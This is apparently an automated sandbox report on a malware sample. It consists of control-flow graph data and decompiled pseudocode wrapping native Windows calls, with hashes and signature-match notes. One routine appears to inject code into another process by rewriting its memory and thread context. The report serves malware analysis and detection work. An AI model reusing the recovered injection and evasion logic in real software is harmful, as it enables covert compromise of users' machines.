17231->17232 17233 404980 17232->17233 17234 40a380 LdrLoadDll 17232->17234 17233->17117 17234->17233 17236 413e50 LdrLoadDll 17235->17236 17238 40464a 17236->17238 17237 404654 17237->17130 17238->17237 17239 417f90 LdrLoadDll 17238->17239 17239->17238 17241 404558 17240->17241 17245 40459a 17240->17245 17242 409b40 LdrLoadDll 17241->17242 17241->17245 17243 40458c 17242->17243 17244 413e50 LdrLoadDll 17243->17244 17244->17245 17245->17135 17247 404725 17246->17247 17248 409d60 LdrLoadDll 17247->17248 17249 4047ab 17248->17249 17250 413e50 LdrLoadDll 17249->17250 17251 403a6b 17250->17251 17251->16401 17253 404c5a 17252->17253 17254 404f10 17253->17254 17255 409d60 LdrLoadDll 17253->17255 17254->17114 17256 404d8a 17255->17256 17257 409d60 LdrLoadDll 17256->17257 17258 404da7 17257->17258 17259 418960 LdrLoadDll 17258->17259 17259->17254 17261 4049ca 17260->17261 17262 413a50 6 API calls 17260->17262 17263 413a50 6 API calls 17261->17263 17262->17261 17264 4049d5 17263->17264 17265 404a08 17264->17265 17266 413a50 6 API calls 17264->17266 17269 404a12 17264->17269 17267 41a0a0 2 API calls 17265->17267 17268 4049fd 17266->17268 17267->17269 17270 413a50 6 API calls 17268->17270 17269->17119 17270->17265 18665 40cf67 18666 40cf89 18665->18666 18667 409e90 LdrLoadDll 18666->18667 18668 40cf9c 18667->18668 18669 418460 LdrLoadDll 18668->18669 18670 40cfab 18669->18670 18671 418a50 2 API calls 18670->18671 18676 40cffa 18670->18676 18672 40cfc2 18671->18672 18673 40cfed 18672->18673 18674 4184e0 LdrLoadDll 18672->18674 18675 418710 2 API calls 18673->18675 18674->18673 18675->18676 17731 40d16d 17732 40d19c 17731->17732 17733 40a010 LdrLoadDll 17732->17733 17734 40d1ae 17733->17734 17735 40d080 2 API calls 17734->17735 17736 40d1bf 17735->17736 17737 40d1e1 17736->17737 17738 40d1c9 17736->17738 17740 40d1f2 17737->17740 17742 418710 2 API calls 17737->17742 17739 40d1d4 17738->17739 17741 418710 2 API calls 17738->17741 17741->17739 17742->17740 17743 418177 17744 

                                                      Control-flow Graph

                                                      control_flow_graph 0 418690-4186d9 call 4191e0 NtReadFile
                                                      C-Code - Quality: 37%
                                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                      				void* _t18;
                                                      				void* _t27;
                                                      				intOrPtr* _t28;
                                                      
                                                      				_t13 = _a4;
                                                      				_t28 = _a4 + 0xc48;
                                                      				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                      				_t4 =  &_a40; // 0x413a31
                                                      				_t6 =  &_a32; // 0x413d72
                                                      				_t12 =  &_a8; // 0x413d72
                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                      				return _t18;
                                                      			}







                                                      APIs
                                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 1:A$r=A$r=A
                                                      • API String ID: 2738559852-4243674446
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 430 409b40-409b69 call 41af70 433 409b6b-409b6e 430->433 434 409b6f-409b7d call 41b390 430->434 437 409b8d-409b9e call 419720 434->437 438 409b7f-409b8a call 41b610 434->438 443 409ba0-409bb4 LdrLoadDll 437->443 444 409bb7-409bba 437->444 438->437 443->444
                                                      C-Code - Quality: 100%
                                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
                                                      				char* _v8;
                                                      				struct _EXCEPTION_RECORD _v12;
                                                      				struct _OBJDIR_INFORMATION _v16;
                                                      				char _v536;
                                                      				void* _t15;
                                                      				struct _OBJDIR_INFORMATION _t17;
                                                      				struct _OBJDIR_INFORMATION _t18;
                                                      				void* _t30;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      
                                                      				_v8 =  &_v536;
                                                      				_t15 = E0041AF70(_a8,  &_v12, 0x104, _a8);
                                                      				_t31 = _t30 + 0xc;
                                                      				if(_t15 != 0) {
                                                      					_t17 = E0041B390(__eflags, _v8);
                                                      					_t32 = _t31 + 4;
                                                      					__eflags = _t17;
                                                      					if(_t17 != 0) {
                                                      						E0041B610( &_v12, 0);
                                                      						_t32 = _t32 + 8;
                                                      					}
                                                      					_t18 = E00419720(_v8);
                                                      					_v16 = _t18;
                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                      						return _v16;
                                                      					}
                                                      					return _t18;
                                                      				} else {
                                                      					return _t15;
                                                      				}
                                                      			}













                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 445 4185da-418631 call 4191e0 NtCreateFile
                                                      C-Code - Quality: 79%
                                                      			E004185DA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                      				long _t21;
                                                      				void* _t31;
                                                      
                                                      				asm("repe imul eax, ebp, 0x5559ada2");
                                                      				_t15 = _a4;
                                                      				_t3 = _t15 + 0xc40; // 0xc40
                                                      				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                      				return _t21;
                                                      			}





                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: bbe331688be3b33058041e66a7ad6c0b7015975019a23d3603797dad705e52f5
                                                      • Instruction ID: a3feab5512edf26ed73c2eb432590556f06f12dacf54985c32a390cd16232cc5
                                                      • Opcode Fuzzy Hash: bbe331688be3b33058041e66a7ad6c0b7015975019a23d3603797dad705e52f5
                                                      • Instruction Fuzzy Hash: 0A01F6B2200208ABCB48CF89CC85EEB37ADAF8C744F058208FA0C97240C630EC40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 448 4185e0-4185f6 449 4185fc-418631 NtCreateFile 448->449 450 4185f7 call 4191e0 448->450 450->449
                                                      C-Code - Quality: 100%
                                                      			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                      				long _t21;
                                                      				void* _t31;
                                                      
                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                      				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                      				return _t21;
                                                      			}





                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 451 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                                                      C-Code - Quality: 100%
                                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                      				long _t14;
                                                      				void* _t21;
                                                      
                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                      				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                      				return _t14;
                                                      			}





                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00418710(intOrPtr _a4, void* _a8) {
                                                      				long _t8;
                                                      				void* _t11;
                                                      
                                                      				_t5 = _a4;
                                                      				_t2 = _t5 + 0x10; // 0x300
                                                      				_t3 = _t5 + 0xc50; // 0x409763
                                                      				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                      				_t8 = NtClose(_a8); // executed
                                                      				return _t8;
                                                      			}





                                                      APIs
                                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E0041870C(intOrPtr _a4, void* _a8) {
                                                      				long _t8;
                                                      				void* _t11;
                                                      
                                                      				asm("out dx, eax");
                                                      				asm("invalid");
                                                      				_t5 = _a4;
                                                      				_t2 = _t5 + 0x10; // 0x300
                                                      				_t3 = _t5 + 0xc50; // 0x409763
                                                      				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                      				_t8 = NtClose(_a8); // executed
                                                      				return _t8;
                                                      			}





                                                      APIs
                                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: f486950ab268172436d66976a68d9f4389135ff85c904a467cc74ed1f1dbadca
                                                      • Instruction ID: 879869b8a26302b38ede4f2345d7176c2bf9e8b2422b97e2fef801080b04498c
                                                      • Opcode Fuzzy Hash: f486950ab268172436d66976a68d9f4389135ff85c904a467cc74ed1f1dbadca
                                                      • Instruction Fuzzy Hash: 6CD02B6950D2C05FDB11FBB4A4C00C27F80EE5115871459CED4A857603D925D305D391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 74%
                                                      			E004088D0(intOrPtr _a4) {
                                                      				intOrPtr _v8;
                                                      				char _v24;
                                                      				char _v284;
                                                      				char _v804;
                                                      				char _v840;
                                                      				void* _t24;
                                                      				void* _t31;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				void* _t39;
                                                      				void* _t48;
                                                      				intOrPtr _t50;
                                                      				void* _t51;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      				void* _t54;
                                                      
                                                      				_t50 = _a4;
                                                      				_t39 = 0; // executed
                                                      				_t24 = E00406E20(_t50,  &_v24); // executed
                                                      				_t52 = _t51 + 8;
                                                      				if(_t24 != 0) {
                                                      					_t40 =  &_v840;
                                                      					E00407030( &_v24,  &_v840);
                                                      					_t53 = _t52 + 8;
                                                      					do {
                                                      						_push(0x104);
                                                      						_push( &_v284);
                                                      						E0041A0F0(_t40);
                                                      						_t40 =  &_v804;
                                                      						E0041A760( &_v284,  &_v804);
                                                      						_t54 = _t53 + 0x10;
                                                      						_t48 = 0x4f;
                                                      						while(1) {
                                                      							_t31 = E00413DF0(_t40, E00413D90(_t50, _t48),  &_v284);
                                                      							_t54 = _t54 + 0x10;
                                                      							if(_t31 != 0) {
                                                      								break;
                                                      							}
                                                      							_t48 = _t48 + 1;
                                                      							if(_t48 <= 0x62) {
                                                      								continue;
                                                      							} else {
                                                      							}
                                                      							goto L8;
                                                      						}
                                                      						_t9 = _t50 + 0x14; // 0xffffe1a5
                                                      						_t40 =  *_t9;
                                                      						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
                                                      						_t39 = 1;
                                                      						L8:
                                                      						_t33 = E00407060( &_v24,  &_v840);
                                                      						_t53 = _t54 + 8;
                                                      					} while (_t33 != 0 && _t39 == 0);
                                                      					_t34 = E004070E0(_t50,  &_v24); // executed
                                                      					if(_t39 == 0) {
                                                      						asm("rdtsc");
                                                      						asm("rdtsc");
                                                      						_v8 = _t34 - 0 + _t34;
                                                      						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
                                                      					}
                                                      					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
                                                      					_t20 = _t50 + 0x31; // 0x5608758b
                                                      					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
                                                      					return 1;
                                                      				} else {
                                                      					return _t24;
                                                      				}
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                      • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                                      • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                      • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3 4188b0-4188e1 call 4191e0 RtlAllocateHeap
                                                      C-Code - Quality: 100%
                                                      			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                      				void* _t10;
                                                      				void* _t15;
                                                      
                                                      				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                      				_t6 =  &_a8; // 0x413536
                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}






                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: 65A
                                                      • API String ID: 1279760036-2085483392
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 16%
                                                      			E004188E8(void* __eax, void* _a4, long _a8, void* _a12) {
                                                      				intOrPtr _v0;
                                                      				char _t11;
                                                      				void* _t16;
                                                      
                                                      				asm("lodsd");
                                                      				[far dword [gs:esi+0x6d](__eax);
                                                      				asm("stosd");
                                                      				asm("loopne 0x57");
                                                      				_t8 = _v0;
                                                      				_t3 = _t8 + 0xc74; // 0xc74
                                                      				E004191E0(_t16, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                      				_t11 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                      				return _t11;
                                                      			}







                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitFreeHeapProcess
                                                      • String ID:
                                                      • API String ID: 1180424539-0
                                                      • Opcode ID: ee2feeefb7ce0a1bcb736060a899dba7e8b8439606bcab3aa9a528ee4b4b709c
                                                      • Instruction ID: 4f22fa57ed0785a79f6c586d48f860ab9e97f1efe1ba2b7e6df7fcc0c3aeee55
                                                      • Opcode Fuzzy Hash: ee2feeefb7ce0a1bcb736060a899dba7e8b8439606bcab3aa9a528ee4b4b709c
                                                      • Instruction Fuzzy Hash: 45F090B4200601BBDB15EF69CC85DA777ACEF84350F00894AF9599B342C930EA14C6F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 92%
                                                      			E00407710(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				char* _v8;
                                                      				char _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v40;
                                                      				char _v44;
                                                      				char _v48;
                                                      				intOrPtr _v68;
                                                      				char _v76;
                                                      				char _v80;
                                                      				char _v84;
                                                      				char _v92;
                                                      				intOrPtr _v104;
                                                      				intOrPtr _v108;
                                                      				intOrPtr _v112;
                                                      				intOrPtr _v116;
                                                      				intOrPtr _v648;
                                                      				char _v832;
                                                      				char _v836;
                                                      				char _v1096;
                                                      				char _v1616;
                                                      				char _v1644;
                                                      				char _v1652;
                                                      				void* _t71;
                                                      				void* _t78;
                                                      				void* _t81;
                                                      				intOrPtr _t82;
                                                      				intOrPtr _t87;
                                                      				void* _t90;
                                                      				char* _t96;
                                                      				void* _t98;
                                                      				intOrPtr _t99;
                                                      				intOrPtr _t107;
                                                      				intOrPtr _t113;
                                                      				intOrPtr _t115;
                                                      				char _t116;
                                                      				void* _t119;
                                                      				intOrPtr _t131;
                                                      				intOrPtr* _t149;
                                                      				intOrPtr _t151;
                                                      				void* _t152;
                                                      				void* _t153;
                                                      				void* _t154;
                                                      				void* _t155;
                                                      				void* _t157;
                                                      
                                                      				_t151 = _a4;
                                                      				_t116 = 0; // executed
                                                      				_t71 = E00406E20(_t151,  &_v24); // executed
                                                      				_t153 = _t152 + 8;
                                                      				if(_t71 == 0) {
                                                      					L20:
                                                      					return _t116;
                                                      				}
                                                      				_t121 =  &_v1652;
                                                      				E00407030( &_v24,  &_v1652);
                                                      				_t149 = _a8;
                                                      				_t154 = _t153 + 8;
                                                      				do {
                                                      					_push(0x104);
                                                      					_push( &_v1096);
                                                      					E0041A0F0(_t121);
                                                      					E0041A760( &_v1096,  &_v1616);
                                                      					_t78 = E00413DF0( &_v1616, 0x19996921,  &_v1096);
                                                      					_t155 = _t154 + 0x18;
                                                      					if(_t78 == 0) {
                                                      						L17:
                                                      						if(_t116 != 0) {
                                                      							break;
                                                      						}
                                                      						goto L18;
                                                      					}
                                                      					_t82 = _a16;
                                                      					if(_t82 != 0x1d) {
                                                      						if(_t82 == 0x1e) {
                                                      							E00405EA0(_t151,  &_v1652);
                                                      							_t155 = _t155 + 8;
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      					_t116 = 0;
                                                      					_v836 = 0;
                                                      					E0041A140( &_v832, 0, 0x328);
                                                      					_v92 = _v1644;
                                                      					_v832 = 0x10007;
                                                      					_v48 = 0x18;
                                                      					_v44 = 0;
                                                      					_v36 = 0;
                                                      					_v40 = 0;
                                                      					_v32 = 0;
                                                      					_v28 = 0;
                                                      					_v116 = 0x438;
                                                      					_t87 = E00417F90(_t151,  &_v80, 0x438,  &_v48,  &_v92);
                                                      					_t155 = _t155 + 0x20;
                                                      					_v104 = _t87;
                                                      					if(_t87 < 0) {
                                                      						goto L18;
                                                      					}
                                                      					if( *((intOrPtr*)(_t151 + 0x1c)) == 0) {
                                                      						L10:
                                                      						E004070A0( &_v24,  &_v76);
                                                      						_t90 = E0040D350(_t151,  &_v84, _v68);
                                                      						_t157 = _t155 + 0x14;
                                                      						if(_t90 != 0) {
                                                      							_t119 = 2 -  *((intOrPtr*)(_t151 + 4)) + E004199B0();
                                                      							_v8 =  *((intOrPtr*)(_t149 + 0x10)) + 2;
                                                      							E00418010(_t151, _v84,  &_v832);
                                                      							_t96 = _v8;
                                                      							 *_t96 = 0x68;
                                                      							 *((intOrPtr*)(_t96 + 1)) = _v648;
                                                      							_t98 = E0040A910(_t151,  &_v80, _t149,  *((intOrPtr*)(_t149 + 0x10)), 2);
                                                      							_t155 = _t157 + 0x20;
                                                      							if(_t98 != 0) {
                                                      								_t99 = _t98 -  *_t149;
                                                      								_v112 = _t99;
                                                      								_v648 = _t119 + _t99;
                                                      								E00418040(_t151, _v84,  &_v832);
                                                      								_v104 = E004180D0(_t151, _v84, _v648 + 5, 0, 0, 0);
                                                      								E004180A0(_t151, _v84, 0);
                                                      								E00418710(_t151, _v84);
                                                      								_push(0x32);
                                                      								_t107 = E00407310(_t151, _t149, _a12,  &_v836);
                                                      								_t155 = _t155 + 0x4c;
                                                      								_t116 = _t107;
                                                      								goto L17;
                                                      							}
                                                      							_t116 = 0;
                                                      							goto L18;
                                                      						}
                                                      						E00418710(_t151, _v80);
                                                      						_t155 = _t157 + 8;
                                                      						goto L18;
                                                      					}
                                                      					E00418180(_t151, _v80, 0x1a,  &_v836, 4, 0); // executed
                                                      					_t155 = _t155 + 0x18;
                                                      					if(_v836 != 0) {
                                                      						goto L10;
                                                      					}
                                                      					_t113 = E0040A910(_t151,  &_v80, _t149,  *((intOrPtr*)(_t149 + 0x10)), 6); // executed
                                                      					_t131 =  *((intOrPtr*)(_t149 + 0x1c));
                                                      					_t155 = _t155 + 0x14;
                                                      					_v108 = _t113;
                                                      					_v112 = _t131;
                                                      					if(_t113 != 0 && _t131 != 0) {
                                                      						_t115 = E00407540(_t151, _t149, _a12,  &_v836,  &_v1652,  &_v24); // executed
                                                      						_t155 = _t155 + 0x18;
                                                      						_t116 = _t115;
                                                      						goto L17;
                                                      					}
                                                      					L18:
                                                      					_t121 =  &_v1652;
                                                      					_t81 = E00407060( &_v24,  &_v1652);
                                                      					_t154 = _t155 + 8;
                                                      				} while (_t81 != 0);
                                                      				E004070E0(_t151,  &_v24); // executed
                                                      				goto L20;
                                                      			}


















































                                                      APIs
                                                      • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 004078B9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentFirmwareVariable
                                                      • String ID:
                                                      • API String ID: 3150624800-0
                                                      • Opcode ID: dbc9e25eed92ce13272b45899ca138fbb3ed474eaf0d44580ff03372e1b25b59
                                                      • Instruction ID: e2536e021f552c15eab68d72f4fae8fca9be7580c69819dfd1917cee2ba8b8ab
                                                      • Opcode Fuzzy Hash: dbc9e25eed92ce13272b45899ca138fbb3ed474eaf0d44580ff03372e1b25b59
                                                      • Instruction Fuzzy Hash: 138141B1D00219ABEB14DF95CC81EEF77BCAF44304F04456EF608A7241E7786A55CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
